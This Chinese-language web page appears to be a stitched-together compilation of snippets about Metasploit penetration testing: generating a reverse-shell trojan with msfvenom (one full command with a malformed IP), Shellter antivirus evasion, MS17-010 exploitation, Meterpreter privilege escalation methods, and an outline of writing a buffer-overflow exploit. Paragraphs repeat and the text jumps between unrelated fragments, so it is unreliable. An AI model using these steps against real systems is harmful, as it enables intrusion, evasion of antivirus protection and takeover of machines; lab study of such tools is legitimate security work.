msf外网渗透_如何使用msf渗透测试

hacker|
7

MSF配合shellter免杀直取系统权限

首先,使用msfvenom生成没有加壳的exe文件,代码如下:msfvenom -p windows/meterpreter/reverse_tcp LHOST=191620128 LPORT=6666 -f exe /opt/shell.exe。然后,将生成的exe文件放入Windows2003系统中进行木马检测,结果显示为木马文件。接着,利用shellter对上述exe文件进行免杀处理。

在本次试验中我们主要使用的是msfpayload(攻击荷载生成器),msfencoder(编码器)的替代品msfvenom,msfvenom集成了前两者的全部功能,可以生成payload(本节所说的木马)以及对payload编码免杀和避免坏字符、捆绑木马等。在KaliLinux中默认安装了Metasploitframework我们可以直接使用。

内网渗透之ms17-010

1、利用Auxiliary辅助探测模块:执行扫描、指纹识别等功能,使用smb_ms17_010模块进行探测。利用exploit漏洞利用模块:查看漏洞信息,针对特定操作系统版本、语言版本的系统进行利用。设置payload攻击载荷:查看可攻击的系统平台,设置攻击载荷参数,如RHOST、LHOST、lport。

2、此次攻击是勒索病毒‘必加’(Petya)的新变种,该变种疑似采用了邮件、下载器和蠕虫的组合传播方式,之后通过MS17-010(永恒之蓝)漏洞和系统弱口令进行内网传播。 同时,经过初步分析发现,Petya捆绑了一个名为“LSADump”的工具,可以从Windows计算机和网络上的域控制器收集密码和凭证数据。

3、内网渗透 当我们能跟内网主机进行通信后,我们就要开始进行内网渗透了。可以先使用nmap对内网主机进行扫描,探测在线的主机,并且探测其使用的操作系统、开放的端口等信息。内网中也有可能存在供内网使用的内网服务器,可以进一步渗透拿下其权限。

4、WannaCry病毒的一个进程名叫mssecsvc.exe 原病毒文件mssecsvc.exe:①会释放并执行tasksche.exe文件,然后检查kill switch域名。②之后它会创建mssecsvc0服务。该服务会使用与初次执行不同的入口点执行mssecsvc.exe文件。

5、除非你位高权重,否则最新的没补丁的未知漏洞不会用在你头上(有个例外,就是这样一枚价值几十万美刀的漏洞居然被提前公开,类似于MS17-010)WindowsDefender很菜,即使有个微软爸爸 杀毒软件说有毒,基本上就是有毒;杀毒软件说没毒,并不代表它真的没毒。

6、日,中国国家互联网应急中心发文称,互联网上出现针对Windows操作系统的勒索软件的攻击案例,勒索软件利用此前披露的WindowsSMB服务漏洞(对应微软漏洞公告:MS17-010)攻击手段,向终端用户进行渗透传播,并向用户勒索比特币或其他价值物。

Meterpreter提权那些事

1、Meterpreter 提权是渗透测试中至关重要的技能。以下将引导您学习如何征服 Meterpreter 提权过程。准备实验环境,Kali Linux 作为攻击机与 Windows Server 2003 作为靶机。第一步:生成后门程序,使用 msfvenom 生成木马(后门)文件,替代早期版本的 msfpayload 和 msfencoder。

2、内核提权 常规内核提权 了解Linux内核版本,使用searchsploit搜索对应漏洞exp并下载c文件进行编译。在meterpreter环境下,将编译好的exp上传至目标系统tmp目录,赋予执行权限。执行后,权限提升至root。

3、在 Metasploit 中,我们可以通过使用 service_permissions 模块来实现这一策略。该模块允许我们修改服务的权限,并在成功提升权限后创建一个新的 meterpreter shell,从而以 SYSTEM 权限执行操作。通过这种方式,我们不仅能够实现提权,还能在不显眼的情况下完成这一过程,从而在渗透测试中保持隐蔽性。

4、通过Shell命令进入cmd,尝试哈希传递技术。遇到环境问题,换个系统尝试,比如Win7。权限提升:创建新用户,部署木马,监听并获取Shell。虽然未成功提权,提示WinXP的局限性。提权建议:在Win7上尝试,内网横向移动和跳板机将在后续文章中深入讲解。

5、Meterpreter,作为Metasploit框架在Windows系统中不可或缺的一部分,已经从最初的临时工具进化为强大的远程控制工具。它如今在许多场景下都能胜任,无需额外的远控上传。

Msfvenom介绍及使用

Msfvenom是一个主要用来生成带后门软件的工具,结合了Msfpayload和Msfencode。自2015年6月8日起,Msfvenom取代了前两者。其参数功能多样,通过查看自带的帮助说明,可以详细了解各个参数的作用。Msfvenom平台集成的payload丰富,从上到下列表浏览需要一定时间。

msfvenom是Metasploit框架中的一个综合工具,用于生成payload和编码。它在2015年取代了msfpayload和msfencode,支持多种平台的payload。通过参数如-p指定payload,-l列出可用选项,-n指定NOP滑动长度,-f指定输出格式,-e选择编码器等,可以定制所需的攻击载荷。

在本次试验中我们主要使用的是msfpayload(攻击荷载生成器),msfencoder(编码器)的替代品msfvenom,msfvenom集成了前两者的全部功能,可以生成payload(本节所说的木马)以及对payload编码免杀和避免坏字符、捆绑木马等。在KaliLinux中默认安装了Metasploitframework我们可以直接使用。

第一步:生成后门程序,使用 msfvenom 生成木马(后门)文件,替代早期版本的 msfpayload 和 msfencoder。生成命令包括:payload选择、监听 IP 和端口、输出格式、编码器、目标架构、平台、编码次数、规避字符集与输出路径。第二步:在攻击机上开启监听,通过 MSF 的多用途 handler 利用。

编写EXP步骤通过x32dbg附加服务程序,使用Python脚本发送payload,成功覆盖EIP为41414141。使用mpattern_offset工具定位返回地址偏移,这里是504。找到合适的跳板地址,如0x75A15978,注意地址在win10开机后保持不变。利用msfvenom生成win10兼容的shellcode,初始选择反弹shell模块,最终选择x86架构。

AlwaysInstallElevated 是一种允许非管理员用户以SYSTEM权限运行安装程序的设置。通过查询注册表项来识别是否存在此设置,如果存在,则可以使用msfvenom等工具生成特定文件来实现提权。最后,DLL劫持提权依赖于Windows应用程序在启动时依赖的DLL。攻击者可以通过替换应用程序寻找的DLL,来达到提权的目的。

0条大神的评论

发表评论